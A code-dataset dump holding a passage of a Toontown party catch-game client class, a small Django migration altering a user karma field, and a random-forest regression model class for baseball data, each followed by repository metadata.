'orange': 0.7,
'pear': 0.5,
'coconut': 0.7,
'watermelon': 0.6,
'pineapple': 0.45}
if modelScales.has_key(objType.name):
model.setScale(modelScales[objType.name])
if objType == PartyGlobals.Name2DropObjectType['pear']:
model.setZ(-.6)
if objType == PartyGlobals.Name2DropObjectType['coconut']:
model.setP(180)
if objType == PartyGlobals.Name2DropObjectType['watermelon']:
model.setH(135)
model.setZ(-.5)
if objType == PartyGlobals.Name2DropObjectType['pineapple']:
model.setZ(-1.7)
if objType == PartyGlobals.Name2DropObjectType['anvil']:
model.setZ(-self.ObjRadius)
model.flattenStrong()
def unload(self):
DistributedPartyCatchActivity.notify.debug('unload')
self.finishAllDropIntervals()
self.destroyOrthoWalk()
DistributedPartyActivity.unload(self)
self.stopDropTask()
del self.activityFSM
del self.__textGen
for avId in self.toonSDs.keys():
if self.toonSDs.has_key(avId):
toonSD = self.toonSDs[avId]
toonSD.unload()
del self.toonSDs
self.treesAndFence.removeNode()
del self.treesAndFence
self.dropShadow.removeNode()
del self.dropShadow
base.cr.parentMgr.unregisterParent(self._avatarNodePathParentToken)
for model in self.dropObjModels.values():
model.removeNode()
del self.dropObjModels
del self.sndGoodCatch
del self.sndOof
del self.sndAnvilLand
del self.sndPerfect
def setStartTimestamp(self, timestamp32):
self.notify.info('setStartTimestamp(%s)' % (timestamp32,))
self._startTimestamp = globalClockDelta.networkToLocalTime(timestamp32, bits=32)
def getCurrentCatchActivityTime(self):
return globalClock.getFrameTime() - self._startTimestamp
def getObjModel(self, objName):
return self.dropObjModels[objName].copyTo(hidden)
def joinRequestDenied(self, reason):
DistributedPartyActivity.joinRequestDenied(self, reason)
base.cr.playGame.getPlace().fsm.request('walk')
def handleToonJoined(self, toonId):
if not self.toonSDs.has_key(toonId):
toonSD = PartyCatchActivityToonSD(toonId, self)
self.toonSDs[toonId] = toonSD
toonSD.load()
self.notify.debug('handleToonJoined : currentState = %s' % self.activityFSM.state)
self.cr.doId2do[toonId].useLOD(500)
if self.activityFSM.state == 'Active':
if self.toonSDs.has_key(toonId):
self.toonSDs[toonId].enter()
if base.localAvatar.doId == toonId:
base.localAvatar.b_setParent(self._avatarNodePathParentToken)
self.putLocalAvatarInActivity()
if self.toonSDs.has_key(toonId):
self.toonSDs[toonId].fsm.request('rules')
def handleToonExited(self, toonId):
self.notify.debug('handleToonExited( toonId=%s )' % toonId)
if self.cr.doId2do.has_key(toonId):
self.cr.doId2do[toonId].resetLOD()
if self.toonSDs.has_key(toonId):
self.toonSDs[toonId].fsm.request('notPlaying')
self.toonSDs[toonId].exit()
self.toonSDs[toonId].unload()
del self.toonSDs[toonId]
if base.localAvatar.doId == toonId:
base.localAvatar.b_setParent(ToontownGlobals.SPRender)
def takeLocalAvatarOutOfActivity(self):
self.notify.debug('localToon has left the circle')
camera.reparentTo(base.localAvatar)
base.localAvatar.startUpdateSmartCamera()
base.localAvatar.enableSmartCameraViews()
base.localAvatar.setCameraPositionByIndex(base.localAvatar.cameraIndex)
DistributedSmoothNode.activateSmoothing(1, 0)
def _enableCollisions(self):
DistributedPartyActivity._enableCollisions(self)
self._enteredTree = False
self.accept('enter' + self.catchTreeZoneEvent, self._toonMayHaveEnteredTree)
self.accept('again' + self.catchTreeZoneEvent, self._toonMayHaveEnteredTree)
self.accept('exit' + self.catchTreeZoneEvent, self._toonExitedTree)
self.accept(DistributedPartyCannonActivity.LOCAL_TOON_LANDED_EVENT, self._handleCannonLanded)
def _disableCollisions(self):
self.ignore(DistributedPartyCannonActivity.LOCAL_TOON_LANDED_EVENT)
self.ignore('enter' + self.catchTreeZoneEvent)
self.ignore('again' + self.catchTreeZoneEvent)
self.ignore('exit' + self.catchTreeZoneEvent)
DistributedPartyActivity._disableCollisions(self)
def _handleCannonLanded(self):
x = base.localAvatar.getX()
y = base.localAvatar.getY()
if x > self.x - self.StageHalfWidth and x < self.x + self.StageHalfWidth and y > self.y - self.StageHalfHeight and y < self.y + self.StageHalfHeight:
self._toonEnteredTree(None)
return
def _toonMayHaveEnteredTree(self, collEntry):
if self._enteredTree:
return
if base.localAvatar.controlManager.currentControls.getIsAirborne():
return
self._toonEnteredTree(collEntry)
def _toonEnteredTree(self, collEntry):
self.notify.debug('_toonEnteredTree : avid = %s' % base.localAvatar.doId)
self.notify.debug('_toonEnteredTree : currentState = %s' % self.activityFSM.state)
if self.isLocalToonInActivity():
return
if self.activityFSM.state == 'Active':
base.cr.playGame.getPlace().fsm.request('activity')
self.d_toonJoinRequest()
elif self.activityFSM.state == 'Idle':
base.cr.playGame.getPlace().fsm.request('activity')
self.d_toonJoinRequest()
self._enteredTree = True
def _toonExitedTree(self, collEntry):
self.notify.debug('_toonExitedTree : avid = %s' % base.localAvatar.doId)
self._enteredTree = False
if hasattr(base.cr.playGame.getPlace(), 'fsm') and self.activityFSM.state == 'Active' and self.isLocalToonInActivity():
if self.toonSDs.has_key(base.localAvatar.doId):
self.takeLocalAvatarOutOfActivity()
self.toonSDs[base.localAvatar.doId].fsm.request('notPlaying')
self.d_toonExitDemand()
def setToonsPlaying(self, toonIds):
self.notify.info('setToonsPlaying(%s)' % (toonIds,))
DistributedPartyActivity.setToonsPlaying(self, toonIds)
if self.isLocalToonInActivity() and base.localAvatar.doId not in toonIds:
if self.toonSDs.has_key(base.localAvatar.doId):
self.takeLocalAvatarOutOfActivity()
self.toonSDs[base.localAvatar.doId].fsm.request('notPlaying')
def __genText(self, text):
self.__textGen.setText(text)
return self.__textGen.generate()
def getNumPlayers(self):
return len(self.toonIds)
def defineConstants(self, forceNumPlayers = None):
DistributedPartyCatchActivity.notify.debug('defineConstants')
self.ShowObjSpheres = 0
self.ShowToonSpheres = 0
self.useGravity = True
self.trickShadows = True
if forceNumPlayers is None:
numPlayers = self.getNumPlayers()
else:
numPlayers = forceNumPlayers
self.calcDifficultyConstants(numPlayers)
DistributedPartyCatchActivity.notify.debug('ToonSpeed: %s' % self.ToonSpeed)
DistributedPartyCatchActivity.notify.debug('total drops: %s' % self.totalDrops)
DistributedPartyCatchActivity.notify.debug('numFruits: %s' % self.numFruits)
DistributedPartyCatchActivity.notify.debug('numAnvils: %s' % self.numAnvils)
self.ObjRadius = 1.0
dropRegionTable = PartyRegionDropPlacer.getDropRegionTable(numPlayers)
self.DropRows, self.DropColumns = len(dropRegionTable), len(dropRegionTable[0])
for objType in PartyGlobals.DropObjectTypes:
DistributedPartyCatchActivity.notify.debug('*** Object Type: %s' % objType.name)
objType.onscreenDuration = objType.onscreenDurMult * self.BaselineOnscreenDropDuration
DistributedPartyCatchActivity.notify.debug('onscreenDuration=%s' % objType.onscreenDuration)
v_0 = 0.0
t = objType.onscreenDuration
x_0 = self.MinOffscreenHeight
x = 0.0
g = 2.0 * (x - x_0 - v_0 * t) / (t * t)
DistributedPartyCatchActivity.notify.debug('gravity=%s' % g)
objType.trajectory = Trajectory(0, Vec3(0, 0, x_0), Vec3(0, 0, v_0), gravMult=abs(g / Trajectory.gravity))
objType.fallDuration = objType.onscreenDuration + self.OffscreenTime
return
def grid2world(self, column, row):
x = column / float(self.DropColumns - 1)
y = row / float(self.DropRows - 1)
x = x * 2.0 - 1.0
y = y * 2.0 - 1.0
x *= self.StageHalfWidth
y *= self.StageHalfHeight
return (x, y)
def showPosts(self):
self.hidePosts()
self.posts = [Toon.Toon(),
Toon.Toon(),
Toon.Toon(),
Toon.Toon()]
for i in xrange(len(self.posts)):
tree = self.posts[i]
tree.reparentTo(render)
x = self.StageHalfWidth
y = self.StageHalfHeight
if i > 1:
x = -x
if i % 2:
y = -y
tree.setPos(x + self.x, y + self.y, 0)
def hidePosts(self):
if hasattr(self, 'posts'):
for tree in self.posts:
tree.removeNode()
del self.posts
def showDropGrid(self):
self.hideDropGrid()
self.dropMarkers = []
for row in xrange(self.DropRows):
self.dropMarkers.append([])
rowList = self.dropMarkers[row]
for column in xrange(self.DropColumns):
toon = Toon.Toon()
toon.setDNA(base.localAvatar.getStyle())
toon.reparentTo(self.root)
toon.setScale(1.0 / 3)
x, y = self.grid2world(column, row)
toon.setPos(x, y, 0)
rowList.append(toon)
def hideDropGrid(self):
if hasattr(self, 'dropMarkers'):
for row in self.dropMarkers:
for marker in row:
marker.removeNode()
del self.dropMarkers
def handleToonDisabled(self, avId):
DistributedPartyCatchActivity.notify.debug('handleToonDisabled')
DistributedPartyCatchActivity.notify.debug('avatar ' + str(avId) + ' disabled')
if self.toonSDs.has_key(avId):
self.toonSDs[avId].exit(unexpectedExit=True)
del self.toonSDs[avId]
def turnOffSmoothingOnGuests(self):
pass
def setState(self, newState, timestamp):
self.notify.info('setState(%s, %s)' % (newState, timestamp))
DistributedPartyCatchActivity.notify.debug('setState( newState=%s, ... )' % newState)
DistributedPartyActivity.setState(self, newState, timestamp)
self.activityFSM.request(newState)
if newState == 'Active':
if base.localAvatar.doId != self.party.partyInfo.hostId:
if globalClock.getFrameCount() > self._generateFrame:
if base.localAvatar.getX() > self.x - self.StageHalfWidth and base.localAvatar.getX() < self.x + self.StageHalfWidth and base.localAvatar.getY() > self.y - self.StageHalfHeight and base.localAvatar.getY() < self.y + self.StageHalfHeight:
self._toonEnteredTree(None)
return
def putLocalAvatarInActivity(self):
if base.cr.playGame.getPlace() and hasattr(base.cr.playGame.getPlace(), 'fsm'):
base.cr.playGame.getPlace().fsm.request('activity', [False])
else:
self.notify.info("Avoided crash: toontown.parties.DistributedPartyCatchActivity:632, toontown.parties.DistributedPartyCatchActivity:1198, toontown.parties.activityFSMMixins:49, direct.fsm.FSM:423, AttributeError: 'NoneType' object has no attribute 'fsm'")
base.localAvatar.stopUpdateSmartCamera()
camera.reparentTo(self.treesAndFence)
camera.setPosHpr(0.0, -63.0, 30.0, 0.0, -20.0, 0.0)
if not hasattr(self, 'ltLegsCollNode'):
self.createCatchCollisions()
def createCatchCollisions(self):
radius = 0.7
handler = CollisionHandlerEvent()
handler.setInPattern('ltCatch%in')
self.ltLegsCollNode = CollisionNode('catchLegsCollNode')
self.ltLegsCollNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
self.ltHeadCollNode = CollisionNode('catchHeadCollNode')
self.ltHeadCollNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
self.ltLHandCollNode = CollisionNode('catchLHandCollNode')
self.ltLHandCollNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
self.ltRHandCollNode = CollisionNode('catchRHandCollNode')
self.ltRHandCollNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
legsCollNodepath = base.localAvatar.attachNewNode(self.ltLegsCollNode)
legsCollNodepath.hide()
head = base.localAvatar.getHeadParts().getPath(2)
headCollNodepath = head.attachNewNode(self.ltHeadCollNode)
headCollNodepath.hide()
lHand = base.localAvatar.getLeftHands()[0]
lHandCollNodepath = lHand.attachNewNode(self.ltLHandCollNode)
lHandCollNodepath.hide()
rHand = base.localAvatar.getRightHands()[0]
rHandCollNodepath = rHand.attachNewNode(self.ltRHandCollNode)
rHandCollNodepath.hide()
base.localAvatar.cTrav.addCollider(legsCollNodepath, handler)
base.localAvatar.cTrav.addCollider(headCollNodepath, handler)
base.localAvatar.cTrav.addCollider(lHandCollNodepath, handler)
base.localAvatar.cTrav.addCollider(lHandCollNodepath, handler)
if self.ShowToonSpheres:
legsCollNodepath.show()
headCollNodepath.show()
lHandCollNodepath.show()
rHandCollNodepath.show()
self.ltLegsCollNode.addSolid(CollisionSphere(0, 0, radius, radius))
self.ltHeadCollNode.addSolid(CollisionSphere(0, 0, 0, radius))
self.ltLHandCollNode.addSolid(CollisionSphere(0, 0, 0, 2 * radius / 3.0))
self.ltRHandCollNode.addSolid(CollisionSphere(0, 0, 0, 2 * radius / 3.0))
self.toonCollNodes = [legsCollNodepath,
headCollNodepath,
lHandCollNodepath,
rHandCollNodepath]
def destroyCatchCollisions(self):
if not hasattr(self, 'ltLegsCollNode'):
return
for collNode in self.toonCollNodes:
while collNode.node().getNumSolids():
collNode.node().removeSolid(0)
base.localAvatar.cTrav.removeCollider(collNode)
del self.toonCollNodes
del self.ltLegsCollNode
del self.ltHeadCollNode
del self.ltLHandCollNode
del self.ltRHandCollNode
def timerExpired(self):
pass
def __handleCatch(self, generation, objNum):
DistributedPartyCatchActivity.notify.debug('catch: %s' % [generation, objNum])
if base.localAvatar.doId not in self.toonIds:
return
self.showCatch(base.localAvatar.doId, generation, objNum)
objName = self._id2gen[generation].droppedObjNames[objNum]
objTypeId = PartyGlobals.Name2DOTypeId[objName]
self.sendUpdate('claimCatch', [generation, objNum, objTypeId])
self.finishDropInterval(generation, objNum)
def showCatch(self, avId, generation, objNum):
if not self.toonSDs.has_key(avId):
return
isLocal = avId == base.localAvatar.doId
if generation not in self._id2gen:
return
if not self._id2gen[generation].hasBeenScheduled:
return
objName = self._id2gen[generation].droppedObjNames[objNum]
objType = PartyGlobals.Name2DropObjectType[objName]
if objType.good:
if not self._id2gen[generation].droppedObjCaught.has_key(objNum):
if isLocal:
base.playSfx(self.sndGoodCatch)
fruit = self.getObjModel(objName)
toon = self.getAvatar(avId)
rHand = toon.getRightHands()[1]
self.toonSDs[avId].eatFruit(fruit, rHand)
else:
self.toonSDs[avId].fsm.request('fallForward')
self._id2gen[generation].droppedObjCaught[objNum] = 1
def setObjectCaught(self, avId, generation, objNum):
self.notify.info('setObjectCaught(%s, %s, %s)' % (avId, generation, objNum))
if self.activityFSM.state != 'Active':
DistributedPartyCatchActivity.notify.warning('ignoring msg: object %s caught by %s' % (objNum, avId))
return
isLocal = avId == base.localAvatar.doId
if not isLocal:
DistributedPartyCatchActivity.notify.debug('AI: avatar %s caught %s' % (avId, objNum))
self.finishDropInterval(generation, objNum)
self.showCatch(avId, generation, objNum)
self._scheduleGenerations()
gen = self._id2gen[generation]
if gen.hasBeenScheduled:
objName = gen.droppedObjNames[objNum]
if PartyGlobals.Name2DropObjectType[objName].good:
if hasattr(self, 'fruitsCaught'):
self.fruitsCaught += 1
def finishDropInterval(self, generation, objNum):
if hasattr(self, 'dropIntervals'):
if self.dropIntervals.has_key((generation, objNum)):
self.dropIntervals[generation, objNum].finish()
def finishAllDropIntervals(self):
if hasattr(self, 'dropIntervals'):
for dropInterval in self.dropIntervals.values():
dropInterval.finish()
def setGenerations(self, generations):
self.notify.info('setGenerations(%s)' % (generations,))
gen2t = {}
gen2nt = {}
gen2np = {}
for id, timestamp32, numPlayers in generations:
gen2t[id] = globalClockDelta.networkToLocalTime(timestamp32, bits=32) - self._startTimestamp
gen2nt[id] = timestamp32
gen2np[id] = numPlayers
ids = self._id2gen.keys()
for id in ids:
if id not in gen2t:
self._removeGeneration(id)
for id in gen2t:
if id not in self._id2gen:
self._addGeneration(id, gen2t[id], gen2nt[id], gen2np[id])
def scheduleDrops(self, genId = None):
if genId is None:
genId = self.getCurGeneration()
gen = self._id2gen[genId]
if gen.hasBeenScheduled:
return
fruitIndex = int((gen.startTime + 0.5 * self.DropPeriod) / PartyGlobals.CatchActivityDuration)
fruitNames = ['apple',
'orange',
'pear',
'coconut',
'watermelon',
'pineapple']
fruitName = fruitNames[fruitIndex % len(fruitNames)]
rng = RandomNumGen(genId + self._generationSeedBase)
gen.droppedObjNames = [fruitName] * self.numFruits + ['anvil'] * self.numAnvils
rng.shuffle(gen.droppedObjNames)
dropPlacer = PartyRegionDropPlacer(self, gen.numPlayers, genId, gen.droppedObjNames, startTime=gen.startTime)
gen.numItemsDropped = 0
tIndex = gen.startTime % PartyGlobals.CatchActivityDuration
tPercent = float(tIndex) / PartyGlobals.CatchActivityDuration
gen.numItemsDropped += dropPlacer.skipPercent(tPercent)
while not dropPlacer.doneDropping(continuous=True):
nextDrop = dropPlacer.getNextDrop()
gen.dropSchedule.append(nextDrop)
gen.hasBeenScheduled = True
return
def startDropTask(self):
taskMgr.add(self.dropTask, self.DropTaskName)
def stopDropTask(self):
taskMgr.remove(self.DropTaskName)
def _scheduleGenerations(self):
curT = self.getCurrentCatchActivityTime()
genIndex = self._orderedGenerationIndex
newGenIndex = genIndex
while genIndex is None or genIndex < len(self._orderedGenerations) - 1:
if genIndex is None:
nextGenIndex = 0
else:
nextGenIndex = genIndex + 1
nextGenId = self._orderedGenerations[nextGenIndex]
nextGen = self._id2gen[nextGenId]
startT = nextGen.startTime
if curT >= startT:
newGenIndex = nextGenIndex
if not nextGen.hasBeenScheduled:
self.defineConstants(forceNumPlayers=nextGen.numPlayers)
self.scheduleDrops(genId=self._orderedGenerations[nextGenIndex])
genIndex = nextGenIndex
self._orderedGenerationIndex = newGenIndex
return
def dropTask(self, task):
self._scheduleGenerations()
curT = self.getCurrentCatchActivityTime()
if self._orderedGenerationIndex is not None:
i = self._orderedGenerationIndex
genIndex = self._orderedGenerations[i]
gen = self._id2gen[genIndex]
while len(gen.dropSchedule) > 0 and gen.dropSchedule[0][0] < curT:
drop = gen.dropSchedule[0]
gen.dropSchedule = gen.dropSchedule[1:]
dropTime, objName, dropCoords = drop
objNum = gen.numItemsDropped
x, y = self.grid2world(*dropCoords)
dropIval = self.getDropIval(x, y, objName, genIndex, objNum)
def cleanup(generation, objNum, self = self):
del self.dropIntervals[generation, objNum]
dropIval.append(Func(Functor(cleanup, genIndex, objNum)))
self.dropIntervals[genIndex, objNum] = dropIval
gen.numItemsDropped += 1
dropIval.start(curT - dropTime)
self._lastDropTime = dropTime
return Task.cont
def getDropIval(self, x, y, dropObjName, generation, num):
objType = PartyGlobals.Name2DropObjectType[dropObjName]
id = (generation, num)
dropNode = hidden.attachNewNode('catchDropNode%s' % (id,))
dropNode.setPos(x, y, 0)
shadow = self.dropShadow.copyTo(dropNode)
shadow.setZ(PartyGlobals.CatchDropShadowHeight)
shadow.setColor(1, 1, 1, 1)
object = self.getObjModel(dropObjName)
object.reparentTo(hidden)
if dropObjName in ['watermelon', 'anvil']:
objH = object.getH()
absDelta = {'watermelon': 12,
'anvil': 15}[dropObjName]
delta = (self.randomNumGen.random() * 2.0 - 1.0) * absDelta
newH = objH + delta
else:
newH = self.randomNumGen.random() * 360.0
object.setH(newH)
sphereName = 'FallObj%s' % (id,)
radius = self.ObjRadius
if objType.good:
radius *= lerp(1.0, 1.3, 0.5)
collSphere = CollisionSphere(0, 0, 0, radius)
collSphere.setTangible(0)
collNode = CollisionNode(sphereName)
collNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
collNode.addSolid(collSphere)
collNodePath = object.attachNewNode(collNode)
collNodePath.hide()
if self.ShowObjSpheres:
collNodePath.show()
catchEventName = 'ltCatch' + sphereName
def eatCollEntry(forward, collEntry):
forward()
self.accept(catchEventName, Functor(eatCollEntry, Functor(self.__handleCatch, id[0], id[1])))
def cleanup(self = self, dropNode = dropNode, id = id, event = catchEventName):
self.ignore(event)
dropNode.removeNode()
duration = objType.fallDuration
onscreenDuration = objType.onscreenDuration
targetShadowScale = 0.3
if self.trickShadows:
intermedScale = targetShadowScale * (self.OffscreenTime / self.BaselineDropDuration)
shadowScaleIval = Sequence(LerpScaleInterval(shadow, self.OffscreenTime, intermedScale, startScale=0))
shadowScaleIval.append(LerpScaleInterval(shadow, duration - self.OffscreenTime, targetShadowScale, startScale=intermedScale))
else:
shadowScaleIval = LerpScaleInterval(shadow, duration, targetShadowScale, startScale=0)
targetShadowAlpha = 0.4
shadowAlphaIval = LerpColorScaleInterval(shadow, self.OffscreenTime, Point4(1, 1, 1, targetShadowAlpha), startColorScale=Point4(1, 1, 1, 0))
shadowIval = Parallel(shadowScaleIval, shadowAlphaIval)
if self.useGravity:
def setObjPos(t, objType = objType, object = object):
z = objType.trajectory.calcZ(t)
object.setZ(z)
setObjPos(0)
dropIval = LerpFunctionInterval(setObjPos, fromData=0, toData=onscreenDuration, duration=onscreenDuration)
else:
startPos = Point3(0, 0, self.MinOffscreenHeight)
object.setPos(startPos)
dropIval = LerpPosInterval(object, onscreenDuration, Point3(0, 0, 0), startPos=startPos, blendType='easeIn')
ival = Sequence(Func(Functor(dropNode.reparentTo, self.root)), Parallel(Sequence(WaitInterval(self.OffscreenTime), Func(Functor(object.reparentTo, dropNode)), dropIval), shadowIval), Func(cleanup), name='drop%s' % (id,))
if objType == PartyGlobals.Name2DropObjectType['anvil']:
ival.append(Func(self.playAnvil))
return ival
def playAnvil(self):
if base.localAvatar.doId in self.toonIds:
base.playSfx(self.sndAnvilLand)
def initOrthoWalk(self):
DistributedPartyCatchActivity.notify.debug('startOrthoWalk')
def doCollisions(oldPos, newPos, self = self):
x = bound(newPos[0], self.StageHalfWidth, -self.StageHalfWidth)
y = bound(newPos[1], self.StageHalfHeight, -self.StageHalfHeight)
newPos.setX(x)
newPos.setY(y)
return newPos
orthoDrive = OrthoDrive(self.ToonSpeed, instantTurn=True)
self.orthoWalk = OrthoWalk(orthoDrive, broadcast=True)
def destroyOrthoWalk(self):
DistributedPartyCatchActivity.notify.debug('destroyOrthoWalk')
if hasattr(self, 'orthoWalk'):
self.orthoWalk.stop()
self.orthoWalk.destroy()
del self.orthoWalk
def startIdle(self):
DistributedPartyCatchActivity.notify.debug('startIdle')
def finishIdle(self):
DistributedPartyCatchActivity.notify.debug('finishIdle')
def startActive(self):
DistributedPartyCatchActivity.notify.debug('startActive')
for avId in self.toonIds:
if self.toonSDs.has_key(avId):
toonSD = self.toonSDs[avId]
toonSD.enter()
toonSD.fsm.request('normal')
self.fruitsCaught = 0
self.dropIntervals = {}
self.startDropTask()
if base.localAvatar.doId in self.toonIds:
self.putLocalAvatarInActivity()
def finishActive(self):
DistributedPartyCatchActivity.notify.debug('finishActive')
self.stopDropTask()
if hasattr(self, 'finishIval'):
self.finishIval.pause()
del self.finishIval
if base.localAvatar.doId in self.toonIds:
self.takeLocalAvatarOutOfActivity()
for ival in self.dropIntervals.values():
ival.finish()
del self.dropIntervals
def startConclusion(self):
DistributedPartyCatchActivity.notify.debug('startConclusion')
for avId in self.toonIds:
if self.toonSDs.has_key(avId):
toonSD = self.toonSDs[avId]
toonSD.fsm.request('notPlaying')
self.destroyCatchCollisions()
if base.localAvatar.doId not in self.toonIds:
return
else:
self.localToonExiting()
if self.fruitsCaught >= self.numFruits:
finishText = TTLocalizer.PartyCatchActivityFinishPerfect
else:
finishText = TTLocalizer.PartyCatchActivityFinish
perfectTextSubnode = hidden.attachNewNode(self.__genText(finishText))
perfectText = hidden.attachNewNode('perfectText')
perfectTextSubnode.reparentTo(perfectText)
frame = self.__textGen.getCardActual()
offsetY = -abs(frame[2] + frame[3]) / 2.0
perfectTextSubnode.setPos(0, 0, offsetY)
perfectText.setColor(1, 0.1, 0.1, 1)
def fadeFunc(t, text = perfectText):
text.setColorScale(1, 1, 1, t)
def destroyText(text = perfectText):
text.removeNode()
textTrack = Sequence(Func(perfectText.reparentTo, aspect2d), Parallel(LerpScaleInterval(perfectText, duration=0.5, scale=0.3, startScale=0.0), LerpFunctionInterval(fadeFunc, fromData=0.0, toData=1.0, duration=0.5)), Wait(2.0), Parallel(LerpScaleInterval(perfectText, duration=0.5, scale=1.0), LerpFunctionInterval(fadeFunc, fromData=1.0, toData=0.0, duration=0.5, blendType='easeIn')), Func(destroyText), WaitInterval(0.5))
soundTrack = SoundInterval(self.sndPerfect)
self.finishIval = Parallel(textTrack, soundTrack)
self.finishIval.start()
def finishConclusion(self):
DistributedPartyCatchActivity.notify.debug('finishConclusion')
if base.localAvatar.doId in self.toonIds:
self.takeLocalAvatarOutOfActivity()
base.cr.playGame.getPlace().fsm.request('walk')
def showJellybeanReward(self, earnedAmount, jarAmount, message):
if earnedAmount > 0:
DistributedPartyActivity.showJellybeanReward(self, earnedAmount, jarAmount, message)
else:
base.cr.playGame.getPlace().fsm.request('walk')
| [
"sweep14@gmail.com"
] | sweep14@gmail.com |
79db1164483eabbbb076982b18db98b693436ece | ce0ee5277f5f9ea329c9839d35e3dca678391d17 | /news/migrations/0006_auto_20150103_2203.py | f95b2846b907b240b31cd41a547ddd4ae0e2249a | [] | no_license | legaultmarc/genomenews | 8e4c7831c01695fad15da45149aaea5cb7c39f7d | 1df77322c9f0f619cf9a2e7aecabd9d7b7b097b0 | refs/heads/master | 2020-04-26T11:37:42.857970 | 2015-01-17T02:19:55 | 2015-01-17T02:19:55 | 25,890,263 | 0 | 0 | null | 2015-03-02T18:44:54 | 2014-10-28T21:10:14 | Python | UTF-8 | Python | false | false | 430 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('news', '0005_auto_20150103_0112'),
]
operations = [
migrations.AlterField(
model_name='user',
name='karma',
field=models.IntegerField(default=0),
preserve_default=True,
),
]
| [
"emmanuel.noutahi@hotmail.ca"
] | emmanuel.noutahi@hotmail.ca |
b9e0b57a5c9666a499ad84824d4b81f20d1bb26f | 4cd7c74ba3562ed233c485c6913a3446ff4bd96f | /agents/active_agent.py | 86a8f29c1ec56c6ff9b93d74e868c97114c6ede6 | [] | no_license | melyamri/woa | 994a0b47040f33dc50139d1f638664c52f34559e | 48419be95e327144de35294afd1e1785126e56e1 | refs/heads/master | 2021-01-23T01:01:45.707062 | 2017-06-05T14:55:52 | 2017-06-05T14:55:52 | 85,864,570 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | from agents.custom_agent import CustomAgent
from controllers.task_manager import TaskManager
from controllers.rule_manager import RuleManager
from objectives.simple_objective import SimpleObjective
import os
class ActiveAgent(CustomAgent):
x = None
y = None
def __init__(self, position, model):
super().__init__(position, model)
self.objective = SimpleObjective()
self.quest_giver = None
def log(self, text):
self.model.log.append(text)
self.model.log = self.model.log[-5:]
def get_portrayal(self):
return {
"Shape": "circle",
"r": 1,
"Color": "black",
"Layer": 1,
"Filled": "true"
}
def add_objective(self, objective, quest_giver):
if self.objective.priority < objective.priority:
self.objective = objective
self.quest_giver = quest_giver
def execute_task(self, task):
TaskManager.execute(task, self)
def decide(self):
RuleManager.reason(self)
def step(self):
self.decide()
def class_name(self):
return "CustomAgent"
def _get_object_id(f):
return "CustomAgent"
def has_complex_objective(self):
return self.objective.class_name().lower() != "simplebbjective" | [
"viktor@jacynycz.es"
] | viktor@jacynycz.es |
6068d949bec5e2a7286acf091a3bdeadea3277ff | 8f99dd67ca5b5222ef74fe5c80e605afcb1bc99c | /pymlb/learning/RandomForestContinuousModel.py | 940b9c6a79b1008ecfcdb2553d6fbb78ebdeded1 | [] | no_license | sangpark/deepball | 96f09c6da3c281384e7119aaf4647a1e028f8a25 | 730d70ca6efe498395e62e2b5892ce704b1dd160 | refs/heads/master | 2021-09-06T21:38:10.830797 | 2018-02-11T22:55:58 | 2018-02-11T22:55:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,314 | py | from pymlb.data import SequenceMatrices
from pymlb.learning import Model
from typing import Dict
from os.path import isfile
import pickle
import numpy as np
from sklearn.ensemble import RandomForestRegressor
class RandomForestContinuousModel(Model):
def __init__(self, key_counts: Dict[str, int], file_name: str = None, **kwargs):
super().__init__(key_counts=key_counts)
self.model = None
self.estimators = kwargs.pop("estimators", 20)
self.preprocessing = {"interaction_order": kwargs.pop("interaction_order", 1),
"recursive_timestep_distance": kwargs.pop("recursive_timestep_distance", 1)}
if file_name is not None and isfile(file_name):
self.import_model(file_name)
def save(self, file_name):
with open(file_name, 'wb') as file:
pickle.dump(self.model, file)
def import_model(self, file_name: str):
if isfile(file_name):
with open(file_name, 'rb') as file:
self.model = pickle.load(file)
if "preprocessing" in self.model:
self.preprocessing = self.model["preprocessing"]
def train(self, matrices: SequenceMatrices, *args, **kwargs):
self.model = {
"preprocessing": self.preprocessing,
"estimators": self.estimators,
"outputs": {},
"input_modification": {}
}
modified_matrices, sample_weights = matrices.flatten_all(missing_value_replacement=0, **self.preprocessing)
# concatenate each set of inputs and outputs into one big input matrix
input_matrix = np.concatenate(
[matrix for key, matrix in sorted(modified_matrices.items()) if key.startswith("in_")], axis=-1)
# # standardize the input values
# input_means = np.mean(input_matrix, axis=0, keepdims=True)
# self.model["input_modification"]["mean"] = input_means
# input_stddevs = np.std(input_matrix, axis=0, keepdims=True) + 0.00001 # use this epsilon so we don't get NaNs
# self.model["input_modification"]["stddev"] = input_stddevs
# input_matrix = (input_matrix - input_means) / input_stddevs
# create the model for each output entry
model = {}
for key, output_matrix in modified_matrices.items():
if not key.startswith("out_"):
continue
model[key] = RandomForestRegressor(n_estimators=self.estimators, n_jobs=-1, max_features=0.333, verbose=1)
model[key].fit(input_matrix, output_matrix, sample_weights[key])
self.model["outputs"] = model
def predict(self, matrices: SequenceMatrices, intermediate_layer: str = None, *args, **kwargs):
if intermediate_layer is not None and intermediate_layer not in self.model["outputs"]:
return {}
time_dimension = matrices.get_max_sequence_length()
modified_matrices, sample_weights = matrices.flatten_all(remove_zero_samples=False,
missing_value_replacement=0, **self.preprocessing)
# concatenate each set of inputs and outputs into one big input matrix
input_matrix = np.concatenate(
[matrix for key, matrix in sorted(modified_matrices.items()) if key.startswith("in_")], axis=-1)
# evaluate the regression for each output
results = {}
for key, model in self.model["outputs"].items():
if not key.startswith("out_") or (intermediate_layer is not None and key != intermediate_layer):
continue
results[key] = model.predict(input_matrix)
# restore the time dimension
if time_dimension is not None:
results[key] = np.reshape(results[key], (-1, time_dimension, results[key].shape[-1]))
return results
def summary(self, *args, **kwargs):
# for each layer and output stat, output the model weights
pass
def input_gradients(self, sample_data: Dict[str, np.ndarray], feature_index: int, timestep_index: int,
output_name: str):
raise NotImplementedError
def feature_gradients(self, sample_data: SequenceMatrices, layer_name: str, output_name: str):
raise NotImplementedError
| [
"dcalzad2@illinois.edu"
] | dcalzad2@illinois.edu |
